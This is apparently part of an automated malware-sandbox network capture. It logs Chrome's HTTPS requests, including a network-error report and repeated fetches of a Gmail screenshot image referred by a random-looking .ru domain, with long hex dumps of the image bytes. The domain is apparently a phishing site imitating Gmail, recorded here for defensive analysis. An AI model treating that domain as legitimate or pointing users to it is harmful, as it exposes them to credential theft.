                      2025-01-14 17:00:48 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 78 75 63 72 2e 76 61 66 64 63 65 6b 67 77 70 2e 72 75 2f 61 49 44 74 36 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 36 34 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                      Data Ascii: [{"age":0,"body":{"elapsed_time":131,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://xucr.vafdcekgwp.ru/aIDt6/","sampling_fraction":1.0,"server_ip":"104.21.64.1","status_code":404,"type":"http.error"},"type":"network-error",
                      2025-01-14 17:00:48 UTC168INHTTP/1.1 200 OK
                      Content-Length: 0
                      date: Tue, 14 Jan 2025 17:00:47 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.550609104.18.161.1174435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:01:01 UTC674OUTGET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1
                      Host: cdn.prod.website-files.com
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://xucr.vafdcekgwp.ru/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 17:01:01 UTC676INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 17:01:01 GMT
                      Content-Type: image/webp
                      Content-Length: 106290
                      Connection: close
                      x-amz-id-2: ykOAIFjBYjIASAiCYVBMeSrMGA6UWk+uKxpq3MpyXwVNqfU1hBcYHQ7hMWTfiN4oaVDzl9stS/sm+R7QzApeYnSnR+sJXig5QtARV1Cx+9Y=
                      x-amz-request-id: F3KQ37YXZ9TVGVHR
                      Last-Modified: Tue, 05 Dec 2023 01:19:11 GMT
                      ETag: "428183bfb7c31d8c3bcc985dac004681"
                      x-amz-server-side-encryption: AES256
                      Cache-Control: max-age=84600, must-revalidate
                      x-amz-version-id: pafjt1WRdKFeFq9Cn_ncOtPAOJJamed.
                      CF-Cache-Status: HIT
                      Age: 17171
                      Accept-Ranges: bytes
                      Access-Control-Allow-Origin: *
                      Server: cloudflare
                      CF-RAY: 901f2f85bb627291-EWR
                      alt-svc: h3=":443"; ma=86400
                      2025-01-14 17:01:01 UTC693INData Raw: 52 49 46 46 2a 9f 01 00 57 45 42 50 56 50 38 20 1e 9f 01 00 b0 3e 06 9d 01 2a cd 06 d3 03 3e 91 46 9d 4b a5 a3 a3 2c a4 b4 39 41 90 12 09 69 6e fc 66 c7 59 0c d2 1b b1 ba dc a8 13 20 6a 2e 19 b3 a7 7f 93 ee ad bf d6 f2 e6 5f fb 29 7c 75 e8 c2 ff e6 f9 82 02 3d f8 3f dd ff 17 f9 03 27 4d cb 9e 57 bc dd e6 cb fc df fd ff 63 1f d9 7f dc fb 01 fe ac 74 ab fe ff fe ab f5 e3 dc 37 ed 27 ed 9f bc 6f fd 3f dc 8f 7b 5f d9 fd 40 3f 93 7a 5c 7a 99 7e f4 7b 07 ff 20 ff 43 ff ff da 57 ff 5f b2 ef f7 cf fc de b5 9f f5 7d 40 3f ff fb 6a 74 a7 f8 7f f3 ef eb 3f d8 3f c2 7f 91 fe b1 ff ff e5 2f c7 ff 3c fe cd fd af fc 5f f9 5f ee 1e 8e fe 47 f3 cf e2 3f b7 7f 96 ff a7 fd e3 da 5f fc 0f f2 1e 1b fd 17 f9 5f f7 5f e1 bf ce fb 11 fc 9f ed b7 e5 7f bb 7f 96 ff c5 fe 13 e6 87
                      Data Ascii: RIFF*WEBPVP8 >*>FK,9AinfY j._)|u=?'MWct7'o?{_@?z\z~{ CW_}@?jt??/<__G?___
                      2025-01-14 17:01:01 UTC1369INData Raw: 57 39 a3 81 2e d6 6e b7 46 7e 35 52 2f 35 4a 18 e6 71 6c a8 84 7e cc 46 a7 42 f5 4c 58 bc 2b d0 0f d0 53 13 e5 bc d6 03 ca 0a 84 2b 0f 30 2b 63 7c b3 bb 9f 46 ca 09 c3 ca de e4 99 ba 9f 03 3b 13 4f 89 10 69 ec 60 ce 0b 44 eb 83 65 7a 2b 75 52 6a bb 49 0e d5 39 b4 a0 65 03 ef 71 2e f5 8a 3b d1 75 b0 63 31 b0 27 69 74 6c ce bf b4 c7 b4 46 da 12 f8 ca 64 78 b3 f0 70 4e 8e 1d 0d 15 b1 be 59 84 09 13 7c b3 08 12 26 7e 3e 51 19 b2 0d 6f 3d f8 31 60 d5 29 21 b4 64 e8 8c 9f a1 c6 f9 89 41 b7 ca 8d f5 f4 7e 94 f5 ae 88 b0 93 38 03 89 bd f3 51 95 45 ba 64 6a 08 10 56 af 60 55 f4 19 f0 58 55 51 ca fa cf f8 6f e6 7d a9 15 70 65 25 fd 2d a7 df 48 df 84 ff f6 c3 d4 4a 95 37 0f cf 03 a3 9c d9 15 fd 35 38 05 2d b8 df bb 0a a0 c8 22 c1 3c 85 c9 4f 97 5f 1e 93 4e 84 c5 88
                      Data Ascii: W9.nF~5R/5Jql~FBLX+S+0+c|F;Oi`Dez+uRjI9eq.;uc1'itlFdxpNY|&~>Qo=1`)!dA~8QEdjV`UXUQo}pe%-HJ758-"<O_N
                      2025-01-14 17:01:01 UTC1369INData Raw: c9 6a 6b 93 df 25 05 48 8b 47 62 53 73 9d a0 f9 28 4a c4 91 0d af 9e d1 38 18 34 e0 a4 a6 4c 9f d8 2a 77 24 55 cf 99 bc 6e 91 e0 86 3d a7 61 2d 2b 15 ba d9 a1 2b 15 79 2d 4c e5 fd 4e 87 2c a3 a9 1c 5f 41 32 39 4d 08 ff d9 0f 4c 22 76 cd 18 f0 1e 8f f5 78 01 f5 e6 98 b0 70 41 33 f2 4f e7 fb fc 33 7e a1 f0 3d ec 57 12 bf df f5 d7 c3 65 1a 68 dc d0 64 61 ba b9 61 bf 75 7c 10 67 95 42 5f 27 1c 11 61 dd 0f ac 75 5e c9 cd 5f 33 d4 92 04 50 70 51 37 68 e1 0c e3 a0 ce 2f 97 0c be 46 ad 74 5d 11 c1 c5 0c c2 cb ce ab 6b d6 e5 eb d6 b0 7f 2d 21 21 18 2e b7 37 66 06 80 8d ba 06 86 59 e9 e4 d3 5f 5f 03 de f7 dc 7a c3 57 30 01 1a fa 7e 31 db e2 16 3f 1e 3a 2c c7 7e 90 71 15 d4 ad 42 34 c3 40 24 7e 93 80 48 53 e3 b7 4a 33 a1 c6 e3 45 5f 7a 9a dc 12 a6 63 24 cc 8f 3e 24
                      Data Ascii: jk%HGbSs(J84L*w$Un=a-++y-LN,_A29ML"vxpA3O3~=Wehdaau|gB_'au^_3PpQ7h/Ft]k-!!.7fY__zW0~1?:,~qB4@$~HSJ3E_zc$>$
                      2025-01-14 17:01:01 UTC1369INData Raw: 26 0f 0d 5e 7f e1 e5 db b1 f7 e9 c1 e1 7e 53 fc 3c bb 79 30 9a e8 c5 91 67 cd a9 28 a0 28 f7 0d 2a a1 78 c0 d1 cf b0 ce 23 b4 05 f1 36 c1 d1 ef fb 32 d7 b4 ab 7e a0 e1 12 55 26 25 5f 2c c2 04 8f 5a 49 28 d1 16 d7 3f 7d c1 5e f5 68 61 6e 52 88 f8 03 c7 00 17 9d 03 5b 86 7a 96 3a 26 e8 e8 88 4b 04 fe 9f 31 17 59 ef e2 1a 9f 56 cb 76 99 58 d8 27 5c 9e 9f 98 dd 5a 86 5b 6f 5e 15 d9 38 26 d6 af a7 cf 91 2a 76 23 ed 93 a7 3c 60 7e 2e b9 a1 34 3b 46 50 58 ba 3a 43 32 0e 56 ba e0 b5 f5 82 59 87 48 42 22 86 a4 d8 37 bd f5 11 d6 6e af b8 f3 27 e7 09 90 0b c0 35 d5 4c 1a 78 79 94 a1 39 8d 10 4a 56 b9 4e 20 50 b5 be 8c eb f3 e0 72 20 7b cb ef 43 17 b3 2c 82 09 8d ac 05 0f 90 86 5e b5 0c 8b 51 2a 9d 64 ee f6 78 95 9a a6 20 9f 76 f1 e6 80 65 5a 73 09 e5 ed b1 03 58 ba
                      Data Ascii: &^~S<y0g((*x#62~U&%_,ZI(?}^hanR[z:&K1YVvX'\Z[o^8&*v#<`~.4;FPX:C2VYHB"7n'5Lxy9JVN Pr {C,^Q*dx veZsX
                      2025-01-14 17:01:01 UTC1369INData Raw: fe 1e 5d bc 98 4e 4d 3f 9a bc ff c3 cb b7 93 09 c9 a7 f3 43 82 17 09 5c 3c 53 88 45 f3 38 ff cc a4 26 be 4d 1f 2c c2 04 8f 5b 75 54 fa c5 fb 63 43 db 62 d5 4a f6 f6 13 a0 70 34 69 37 50 88 ed 82 b0 5f 64 c2 67 09 98 2d 23 b2 9f 92 e0 b0 86 47 1e 3a 6a 75 eb 79 b4 70 83 f5 55 a7 dd 5b d0 f8 b7 41 f8 a6 46 5c 70 d0 06 7a a5 02 e6 b2 29 05 74 ef 84 5d 56 48 64 35 9f e0 3b 38 4e 02 10 00 9e 3d a0 58 a7 6b f8 32 b4 ab af 53 09 54 27 72 eb ee 03 a9 ad 73 52 88 8b 84 71 e4 26 a5 ec bc 34 e7 a0 e2 ea ed 50 e4 7d 0e 89 5f ab 6f fd e5 ba 14 48 98 2e b9 e4 c7 3b eb 61 f8 11 b6 6c f4 40 88 e6 20 1d dd aa 47 41 cb ad 1a ec e1 34 cf 11 6f 5d 18 50 01 31 bb 8f bb 10 e0 e7 57 dc 48 ca be d0 a4 fc bb 9c a6 72 bf 3a 79 54 ce 99 b2 5e 1a 6d ae 11 a8 c1 7f 06 64 6d 8c 8a ef
                      Data Ascii: ]NM?C\<SE8&M,[uTcCbJp4i7P_dg-#G:juypU[AF\pz)t]VHd5;8N=Xk2ST'rsRq&4P}_oH.;al@ GA4o]P1WHr:yT^mdm
                      2025-01-14 17:01:01 UTC1369INData Raw: 5e 68 3b ee 56 28 82 b6 44 b3 4f b1 6e ea 8f c5 b1 ab a7 0e c6 c2 5b a4 a6 a6 34 99 a5 6d 03 f2 f4 97 cc 1e 7d ad 58 6b 63 88 8a 31 cc 96 16 1c 83 bb b5 9d bc 0f 47 78 39 b0 58 0f cf 66 1b 03 75 bb 83 b9 a7 7f 78 5d c7 b0 df 58 d8 a5 28 7b 2d 42 71 5a 32 9c fd ed 43 33 2f 49 7c ae 07 39 2c 11 26 f3 73 c0 b0 a1 b6 7d fd 36 b3 b5 a8 46 56 d6 f0 1c 2e 44 6e 4b 5f a9 f3 93 5b 39 33 6a c2 fd 3d 86 fd cd f4 ef 09 86 f5 98 3e cc 5a 6b fa d3 98 72 c7 4b 76 a6 a9 6f 58 d2 39 a8 00 cb c3 94 82 e5 24 06 29 be 73 ce e9 9e f4 46 57 b6 c0 9e f6 a6 bb df 08 e9 d9 16 cb 37 03 bd 98 14 43 7d 9b 7b ef 34 ff a5 6a 4c 8d e1 d6 ed a0 90 3d e4 81 52 7c 47 c1 4c 6f f2 7a 85 7c 35 1b 70 62 55 cc 5d c8 c1 8c 7d 1b 2b b0 73 c4 a9 6f cd 79 c4 0b 42 99 19 17 51 0d 21 46 fc ff 8e 10
                      Data Ascii: ^h;V(DOn[4m}Xkc1Gx9Xfux]X({-BqZ2C3/I|9,&s}6FV.DnK_[93j=>ZkrKvoX9$)sFW7C}{4jL=R|GLoz|5pbU]}+soyBQ!F
                      2025-01-14 17:01:01 UTC1369INData Raw: 04 97 dc 23 ce da ee 0c 71 7c 08 57 8d ea c8 88 bd 38 c4 ab 72 aa cb 0c fb 1e f0 88 df 96 27 d4 2e e7 3e 09 ef da 6d 5e 68 dd 97 44 6e 43 0f a5 78 d8 96 b5 7b ed aa 8c 7f e4 51 c6 00 0f 60 c1 ab c9 f1 98 4f ea a7 e8 4d f6 f5 d1 7c 62 ca 0a fc 0d 53 7d cb c3 7b dd f7 68 49 ff 85 02 73 71 4d 76 17 21 a3 86 a8 c6 37 e4 ed 11 d7 30 1a dc bb f3 fb 6d b2 87 d4 d3 0d d8 9f 7d 83 8d 79 ea b0 1b 25 33 e4 7b fa e5 af 56 ab 75 a8 35 93 b5 b7 5d e2 33 4c 87 6e e5 67 65 de e5 2c 2a 01 0a 35 31 09 c2 2c e6 1f 2c 01 80 80 f7 08 80 b2 cc e0 7e 77 27 a7 77 56 10 8e 4d 8e e1 56 96 36 3c 86 bd c7 21 1b 56 94 18 50 3c 3e 76 a1 48 f5 78 9a 48 c6 49 95 18 b3 02 fb f2 57 33 78 50 c2 99 b1 77 d7 f1 3a ec 36 3c d4 45 ad 47 44 4d 8d 38 25 cf 28 f3 ed cd 9a 3a bf 60 6f 77 99 d6 9e
                      Data Ascii: #q|W8r'.>m^hDnCx{Q`OM|bS}{hIsqMv!70m}y%3{Vu5]3Lnge,*51,,~w'wVMV6<!VP<>vHxHIW3xPw:6<EGDM8%(:`ow
                      2025-01-14 17:01:01 UTC1369INData Raw: 07 b2 30 78 3f 7a 8d 7b 0c da 26 3e ef a9 95 c6 8e 9a 2e cd cf a4 79 0d 6b 57 ba 17 bc 2f 06 88 c8 9d c1 91 85 5c 14 90 05 e8 4b 2d be 2d 68 ce 6a 69 07 ed 67 2e ac 4c 6b b7 da 39 0e af 7c a1 f8 97 bf d9 a4 2b 79 f2 8d 67 76 2c 58 00 da 2f d6 f8 ad c7 74 4e 6b fe 79 6b 8b 44 7b d2 51 a5 44 de 8c 40 99 78 61 72 a9 a2 eb 38 c3 e9 80 b6 9b f5 68 43 3f 21 07 82 c9 af 05 90 33 19 e3 8d 50 dc 70 42 08 89 e2 9d a0 af 9e c3 7c 78 e1 8a 36 4f 8d 25 6b ee e6 68 8e 34 fa 23 22 83 fd 2c 1e 5c d2 86 bc c4 26 e3 31 1c 16 12 07 a0 e4 b7 dc cd ca 11 90 61 73 3f c1 c3 f4 fb eb ff b8 b7 6f 53 f4 66 10 cb 36 07 b8 31 e4 5c 7d cd 6e 0d 2e 03 1e 6b 76 01 6e 64 9e 19 5f 2b 8a c7 7f 4a e7 de a4 4b b9 48 35 10 af 3a e7 9d cf e5 32 30 48 17 6d b4 02 38 b3 d2 a7 8c 81 fb bc 0f 5c
                      Data Ascii: 0x?z{&>.ykW/\K--hjig.Lk9|+ygv,X/tNkykD{QD@xar8hC?!3PpB|x6O%kh4#",\&1as?oSf61\}n.kvnd_+JKH5:20Hm8\
                      2025-01-14 17:01:01 UTC1369INData Raw: 53 e6 91 aa 1d fc 59 93 83 3b 61 bd b7 81 8b b1 4b 7a ed da fa 6a 69 c5 23 e8 fe 62 bd 24 ba 78 a0 60 ca 10 d3 fa b6 47 4c 3b 16 02 fc f2 ee 54 cd cd 3a d2 c3 77 58 cd 84 29 d2 d6 63 62 eb 18 6d 2a f0 70 0c b7 c7 24 5e 1c 1e d9 29 90 41 df b6 e5 78 d2 0d e9 f3 10 cd 0a df 2f 31 da 65 e7 bd 38 b9 e6 54 94 76 6a 08 d7 cf 50 98 6d 43 50 d6 1c 2c e6 67 06 88 27 92 34 0b 69 c4 db 27 a5 9d 52 bb 30 76 aa 46 e0 05 c2 c0 99 4a 6e 7a 92 b9 fc 8b e3 1a 28 0b b2 7c 05 17 4a e9 08 a1 e9 ad 3b 19 6e 68 4d 05 7f 88 72 ef 28 b1 73 7f ca d9 57 ba 2e 09 82 aa 16 6f c7 56 1e 04 39 ef 8b 1d 41 2c 1a f6 2c f5 73 5c 1a 2b 4a fe 11 fa 94 16 e7 8d c4 09 1f 78 b0 bd 44 fb 4a 87 9b 72 e0 76 52 45 cb 40 63 84 0c 30 ef 11 e1 f2 32 30 70 18 de c1 0a ba b4 40 91 37 b0 94 60 41 be da
                      Data Ascii: SY;aKzji#b$x`GL;T:wX)cbm*p$^)Ax/1e8TvjPmCP,g'4i'R0vFJnz(|J;nhMr(sW.oV9A,,s\+JxDJrvRE@c020p@7`A
                      2025-01-14 17:01:01 UTC1369INData Raw: c2 21 71 94 dc be 4d 53 7c b0 32 f9 69 c6 ce d0 3e e5 1a 8e 65 b0 18 9c fc 23 bc b8 2f 2a 1c b5 2d cd 48 70 b6 82 42 8b a9 d0 fa 9c 28 30 55 5e 9d ad a9 b2 11 b4 0e 83 67 98 0b c5 f0 6a db 02 84 c4 d8 7d 6a 35 b6 75 c3 87 ba 21 9e 92 70 12 10 25 3b de 39 bc d5 a3 84 b5 21 d0 89 e7 59 a4 57 be ae ef 8f 22 c6 4f 87 84 b7 a2 2c e5 9d 6a 32 4b 61 da c8 4b 32 b5 15 04 67 c8 c6 3a ec e6 d7 d3 8a b2 96 25 b2 75 85 a6 c3 2f cb fe a9 ec 3f 3d 84 f5 ff f4 fb 77 31 cf 99 24 2e 1a 02 85 76 b0 b9 0c 94 74 fa 59 66 f1 1c 86 e7 8a a9 db 34 20 03 ab 20 fe 53 60 90 c5 f3 e3 5b 19 3e 1a ba 37 24 b9 06 0c d0 5b fe 9b 9c 53 c8 2c 29 c1 21 1c ed b2 7d 36 46 df ff ad ec fa 34 e3 55 b3 ea 46 e1 6e 8e 89 3d c5 d7 79 e6 4e 61 5b e5 22 13 e6 89 6d 72 bd 61 97 86 8a c8 d1 3b 68 fb
                      Data Ascii: !qMS|2i>e#/*-HpB(0U^gj}j5u!p%;9!YW"O,j2KaK2g:%u/?=w1$.vtYf4 S`[>7$[S,)!}6F4UFn=yNa["mra;h


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.550615104.18.161.1174435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:01:02 UTC436OUTGET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1
                      Host: cdn.prod.website-files.com
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 17:01:02 UTC676INHTTP/1.1 200 OK
                      Date: Tue, 14 Jan 2025 17:01:02 GMT
                      Content-Type: image/webp
                      Content-Length: 106290
                      Connection: close
                      x-amz-id-2: ykOAIFjBYjIASAiCYVBMeSrMGA6UWk+uKxpq3MpyXwVNqfU1hBcYHQ7hMWTfiN4oaVDzl9stS/sm+R7QzApeYnSnR+sJXig5QtARV1Cx+9Y=
                      x-amz-request-id: F3KQ37YXZ9TVGVHR
                      Last-Modified: Tue, 05 Dec 2023 01:19:11 GMT
                      ETag: "428183bfb7c31d8c3bcc985dac004681"
                      x-amz-server-side-encryption: AES256
                      Cache-Control: max-age=84600, must-revalidate
                      x-amz-version-id: pafjt1WRdKFeFq9Cn_ncOtPAOJJamed.
                      CF-Cache-Status: HIT
                      Age: 17172
                      Accept-Ranges: bytes
                      Access-Control-Allow-Origin: *
                      Server: cloudflare
                      CF-RAY: 901f2f8ada710f7b-EWR
                      alt-svc: h3=":443"; ma=86400
                      2025-01-14 17:01:02 UTC693INData Raw: 52 49 46 46 2a 9f 01 00 57 45 42 50 56 50 38 20 1e 9f 01 00 b0 3e 06 9d 01 2a cd 06 d3 03 3e 91 46 9d 4b a5 a3 a3 2c a4 b4 39 41 90 12 09 69 6e fc 66 c7 59 0c d2 1b b1 ba dc a8 13 20 6a 2e 19 b3 a7 7f 93 ee ad bf d6 f2 e6 5f fb 29 7c 75 e8 c2 ff e6 f9 82 02 3d f8 3f dd ff 17 f9 03 27 4d cb 9e 57 bc dd e6 cb fc df fd ff 63 1f d9 7f dc fb 01 fe ac 74 ab fe ff fe ab f5 e3 dc 37 ed 27 ed 9f bc 6f fd 3f dc 8f 7b 5f d9 fd 40 3f 93 7a 5c 7a 99 7e f4 7b 07 ff 20 ff 43 ff ff da 57 ff 5f b2 ef f7 cf fc de b5 9f f5 7d 40 3f ff fb 6a 74 a7 f8 7f f3 ef eb 3f d8 3f c2 7f 91 fe b1 ff ff e5 2f c7 ff 3c fe cd fd af fc 5f f9 5f ee 1e 8e fe 47 f3 cf e2 3f b7 7f 96 ff a7 fd e3 da 5f fc 0f f2 1e 1b fd 17 f9 5f f7 5f e1 bf ce fb 11 fc 9f ed b7 e5 7f bb 7f 96 ff c5 fe 13 e6 87
                      Data Ascii: RIFF*WEBPVP8 >*>FK,9AinfY j._)|u=?'MWct7'o?{_@?z\z~{ CW_}@?jt??/<__G?___
                      2025-01-14 17:01:02 UTC1369INData Raw: 57 39 a3 81 2e d6 6e b7 46 7e 35 52 2f 35 4a 18 e6 71 6c a8 84 7e cc 46 a7 42 f5 4c 58 bc 2b d0 0f d0 53 13 e5 bc d6 03 ca 0a 84 2b 0f 30 2b 63 7c b3 bb 9f 46 ca 09 c3 ca de e4 99 ba 9f 03 3b 13 4f 89 10 69 ec 60 ce 0b 44 eb 83 65 7a 2b 75 52 6a bb 49 0e d5 39 b4 a0 65 03 ef 71 2e f5 8a 3b d1 75 b0 63 31 b0 27 69 74 6c ce bf b4 c7 b4 46 da 12 f8 ca 64 78 b3 f0 70 4e 8e 1d 0d 15 b1 be 59 84 09 13 7c b3 08 12 26 7e 3e 51 19 b2 0d 6f 3d f8 31 60 d5 29 21 b4 64 e8 8c 9f a1 c6 f9 89 41 b7 ca 8d f5 f4 7e 94 f5 ae 88 b0 93 38 03 89 bd f3 51 95 45 ba 64 6a 08 10 56 af 60 55 f4 19 f0 58 55 51 ca fa cf f8 6f e6 7d a9 15 70 65 25 fd 2d a7 df 48 df 84 ff f6 c3 d4 4a 95 37 0f cf 03 a3 9c d9 15 fd 35 38 05 2d b8 df bb 0a a0 c8 22 c1 3c 85 c9 4f 97 5f 1e 93 4e 84 c5 88
                      Data Ascii: W9.nF~5R/5Jql~FBLX+S+0+c|F;Oi`Dez+uRjI9eq.;uc1'itlFdxpNY|&~>Qo=1`)!dA~8QEdjV`UXUQo}pe%-HJ758-"<O_N
                      2025-01-14 17:01:02 UTC1369INData Raw: c9 6a 6b 93 df 25 05 48 8b 47 62 53 73 9d a0 f9 28 4a c4 91 0d af 9e d1 38 18 34 e0 a4 a6 4c 9f d8 2a 77 24 55 cf 99 bc 6e 91 e0 86 3d a7 61 2d 2b 15 ba d9 a1 2b 15 79 2d 4c e5 fd 4e 87 2c a3 a9 1c 5f 41 32 39 4d 08 ff d9 0f 4c 22 76 cd 18 f0 1e 8f f5 78 01 f5 e6 98 b0 70 41 33 f2 4f e7 fb fc 33 7e a1 f0 3d ec 57 12 bf df f5 d7 c3 65 1a 68 dc d0 64 61 ba b9 61 bf 75 7c 10 67 95 42 5f 27 1c 11 61 dd 0f ac 75 5e c9 cd 5f 33 d4 92 04 50 70 51 37 68 e1 0c e3 a0 ce 2f 97 0c be 46 ad 74 5d 11 c1 c5 0c c2 cb ce ab 6b d6 e5 eb d6 b0 7f 2d 21 21 18 2e b7 37 66 06 80 8d ba 06 86 59 e9 e4 d3 5f 5f 03 de f7 dc 7a c3 57 30 01 1a fa 7e 31 db e2 16 3f 1e 3a 2c c7 7e 90 71 15 d4 ad 42 34 c3 40 24 7e 93 80 48 53 e3 b7 4a 33 a1 c6 e3 45 5f 7a 9a dc 12 a6 63 24 cc 8f 3e 24
                      Data Ascii: jk%HGbSs(J84L*w$Un=a-++y-LN,_A29ML"vxpA3O3~=Wehdaau|gB_'au^_3PpQ7h/Ft]k-!!.7fY__zW0~1?:,~qB4@$~HSJ3E_zc$>$
                      2025-01-14 17:01:02 UTC1369INData Raw: 26 0f 0d 5e 7f e1 e5 db b1 f7 e9 c1 e1 7e 53 fc 3c bb 79 30 9a e8 c5 91 67 cd a9 28 a0 28 f7 0d 2a a1 78 c0 d1 cf b0 ce 23 b4 05 f1 36 c1 d1 ef fb 32 d7 b4 ab 7e a0 e1 12 55 26 25 5f 2c c2 04 8f 5a 49 28 d1 16 d7 3f 7d c1 5e f5 68 61 6e 52 88 f8 03 c7 00 17 9d 03 5b 86 7a 96 3a 26 e8 e8 88 4b 04 fe 9f 31 17 59 ef e2 1a 9f 56 cb 76 99 58 d8 27 5c 9e 9f 98 dd 5a 86 5b 6f 5e 15 d9 38 26 d6 af a7 cf 91 2a 76 23 ed 93 a7 3c 60 7e 2e b9 a1 34 3b 46 50 58 ba 3a 43 32 0e 56 ba e0 b5 f5 82 59 87 48 42 22 86 a4 d8 37 bd f5 11 d6 6e af b8 f3 27 e7 09 90 0b c0 35 d5 4c 1a 78 79 94 a1 39 8d 10 4a 56 b9 4e 20 50 b5 be 8c eb f3 e0 72 20 7b cb ef 43 17 b3 2c 82 09 8d ac 05 0f 90 86 5e b5 0c 8b 51 2a 9d 64 ee f6 78 95 9a a6 20 9f 76 f1 e6 80 65 5a 73 09 e5 ed b1 03 58 ba
                      Data Ascii: &^~S<y0g((*x#62~U&%_,ZI(?}^hanR[z:&K1YVvX'\Z[o^8&*v#<`~.4;FPX:C2VYHB"7n'5Lxy9JVN Pr {C,^Q*dx veZsX
                      2025-01-14 17:01:02 UTC1369INData Raw: fe 1e 5d bc 98 4e 4d 3f 9a bc ff c3 cb b7 93 09 c9 a7 f3 43 82 17 09 5c 3c 53 88 45 f3 38 ff cc a4 26 be 4d 1f 2c c2 04 8f 5b 75 54 fa c5 fb 63 43 db 62 d5 4a f6 f6 13 a0 70 34 69 37 50 88 ed 82 b0 5f 64 c2 67 09 98 2d 23 b2 9f 92 e0 b0 86 47 1e 3a 6a 75 eb 79 b4 70 83 f5 55 a7 dd 5b d0 f8 b7 41 f8 a6 46 5c 70 d0 06 7a a5 02 e6 b2 29 05 74 ef 84 5d 56 48 64 35 9f e0 3b 38 4e 02 10 00 9e 3d a0 58 a7 6b f8 32 b4 ab af 53 09 54 27 72 eb ee 03 a9 ad 73 52 88 8b 84 71 e4 26 a5 ec bc 34 e7 a0 e2 ea ed 50 e4 7d 0e 89 5f ab 6f fd e5 ba 14 48 98 2e b9 e4 c7 3b eb 61 f8 11 b6 6c f4 40 88 e6 20 1d dd aa 47 41 cb ad 1a ec e1 34 cf 11 6f 5d 18 50 01 31 bb 8f bb 10 e0 e7 57 dc 48 ca be d0 a4 fc bb 9c a6 72 bf 3a 79 54 ce 99 b2 5e 1a 6d ae 11 a8 c1 7f 06 64 6d 8c 8a ef
                      Data Ascii: ]NM?C\<SE8&M,[uTcCbJp4i7P_dg-#G:juypU[AF\pz)t]VHd5;8N=Xk2ST'rsRq&4P}_oH.;al@ GA4o]P1WHr:yT^mdm
                      2025-01-14 17:01:02 UTC1369INData Raw: 5e 68 3b ee 56 28 82 b6 44 b3 4f b1 6e ea 8f c5 b1 ab a7 0e c6 c2 5b a4 a6 a6 34 99 a5 6d 03 f2 f4 97 cc 1e 7d ad 58 6b 63 88 8a 31 cc 96 16 1c 83 bb b5 9d bc 0f 47 78 39 b0 58 0f cf 66 1b 03 75 bb 83 b9 a7 7f 78 5d c7 b0 df 58 d8 a5 28 7b 2d 42 71 5a 32 9c fd ed 43 33 2f 49 7c ae 07 39 2c 11 26 f3 73 c0 b0 a1 b6 7d fd 36 b3 b5 a8 46 56 d6 f0 1c 2e 44 6e 4b 5f a9 f3 93 5b 39 33 6a c2 fd 3d 86 fd cd f4 ef 09 86 f5 98 3e cc 5a 6b fa d3 98 72 c7 4b 76 a6 a9 6f 58 d2 39 a8 00 cb c3 94 82 e5 24 06 29 be 73 ce e9 9e f4 46 57 b6 c0 9e f6 a6 bb df 08 e9 d9 16 cb 37 03 bd 98 14 43 7d 9b 7b ef 34 ff a5 6a 4c 8d e1 d6 ed a0 90 3d e4 81 52 7c 47 c1 4c 6f f2 7a 85 7c 35 1b 70 62 55 cc 5d c8 c1 8c 7d 1b 2b b0 73 c4 a9 6f cd 79 c4 0b 42 99 19 17 51 0d 21 46 fc ff 8e 10
                      Data Ascii: ^h;V(DOn[4m}Xkc1Gx9Xfux]X({-BqZ2C3/I|9,&s}6FV.DnK_[93j=>ZkrKvoX9$)sFW7C}{4jL=R|GLoz|5pbU]}+soyBQ!F
